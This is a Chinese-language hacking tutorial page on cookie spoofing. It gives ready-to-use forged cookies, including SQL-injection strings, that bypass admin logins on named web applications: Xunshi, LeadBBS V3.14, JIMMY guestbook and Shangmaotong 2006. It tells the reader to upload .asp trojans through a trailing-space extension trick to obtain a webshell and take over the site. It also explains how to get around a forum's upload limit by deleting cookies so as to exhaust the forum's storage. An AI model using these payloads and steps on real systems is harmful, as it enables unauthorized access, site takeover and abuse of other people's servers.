1.利用Cookie欺骗攻击网站
偷到网站管理员Cookie后,就能利用Cookie欺骗攻击该站了,方法是:打开要攻击站后台管理页面,用“老兵Cookie欺骗工具”向该站服务器提交管理员Cookie,这样即可冒充管理员绕过密码验证登入后台,然后再通过后台的上传功能上传木马拿下Webshell,下面我们以入侵“讯时管理系统”网站为例,介绍操作步骤。
用“讯时管理系统”代码建的网站有Cookie欺骗漏洞,打开“桂林老兵Cookies的欺骗工具”,在address栏中输入该站管理员登录页地址,尝试使用以下两个Cookies进行注入:
admindj=1;adminuser=%27or%27%3d%27or%27;adminpass=21232f297a5dfd或者
admindj=1;adminuser=%27or%27%3d%27or%27;adminpass=21232f297a5dfd%27or%27%3d%27or%27='or'='or'
点击“桂林老兵Cookies的欺骗工具”工具栏上的黄色小锁按钮,把以上2个Cookies分别复制到Cookies框中,再点击右边的“连接”按钮,看能否直接进入后台登录页面,如果能进入,说明该Cookie注入获得成功;例如我们将admindj=1;adminuser=%27or%27%3d%27or%27;adminpass=21232f297a5dfd%27or%27%3d%27or%27='or'='or'粘贴到Cookies框中,点右边的“连接”按钮,发现成功以'or'='or'身份登入该站后台管理系统,最后你可以传马拿下该站。
以下是Cookie欺骗攻击网站案例。
网站程序名
管理员登录页地址
攻击时使用的Cookies
LeadBBS V3.14 美化插件版
http://127.0.0.1/bbs/manage/
gbtoyAtBD=0; path=/ASPSESSIONIDAQDRRDBD=DMMBDEPBNOGCKDGKBKEHGHAN; path=/gbtoyTime=2005%2D3%2D25+19%3A48%3A19; path=/gbtoy=pass=111222333&user=%B0%D7%CC%EC%B5%C4%C3%A8; path=/
修改以上Cookies ,user=后面是会员ID,把总斑竹的ID换上去;冒充总斑竹登入后台后,在上传文件参数里添加.asp文件(在.asp后多加一个空格),上传木马时也要在扩展名后多打一个空格。
JIMMY中文站留言簿 v1.08
http://127.0.0.1/JIMMY/admin-index.asp
ASPSESSIONIDSQSRTSDC=DMJDAGLBOJNGBIGJPJAHIPOA; lunjilyb=randomid=12&password=jkh&username=jkh
商贸通2006地方门户版系统
http://127.0.0.1/admin/manage.asp
adminID=5;admin=admin;adminflag=1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
2.利用Cookie欺骗实现无限上传
在百度或GOOGLE中搜索“动网论坛”找到一个动网论坛,打开该论坛注册一个会员名,随之你的硬盘上就会生成一个Cookie文件,以后登录论坛后只能上传5个文件,如果你想上传无限个文件,可以删除本地硬盘中的Cookie,因为会员上传文件的数量保存在Cookie中,删除之即可重新上传5个文件,操作步骤:
启动IE,点击菜单“工具”/Internet选项,在“常规”选项卡中点“删除Cookies”,删除本地Cookie,然后刷新论坛,此时会看到你的登录无效、需要重新登录;接下来重新登录,然后你又可以再上传5个文件了,如此循环进行删除Cookie、上传文件操作,这样即可实现无限上传,估计要不了多久论坛空间就会被你撑破的!
- 相关阅读:
- ·经久不衰?2015年DDoS攻击增长180%!
//safe.zol.com.cn/559/5596064.html - ·应对海量DDoS攻击 在云端清洗更有效
//safe.zol.com.cn/558/5582194.html - ·2015年1/3企业电脑暴露在网络攻击之下
//safe.zol.com.cn/557/5578593.html - ·2015年三季度:DDoS攻击再创历史新高
//safe.zol.com.cn/556/5569832.html - ·该换密钥了 数百万物联网设备或受攻击
//safe.zol.com.cn/555/5551704.html
- 第3页:利用Cookie欺骗攻击网站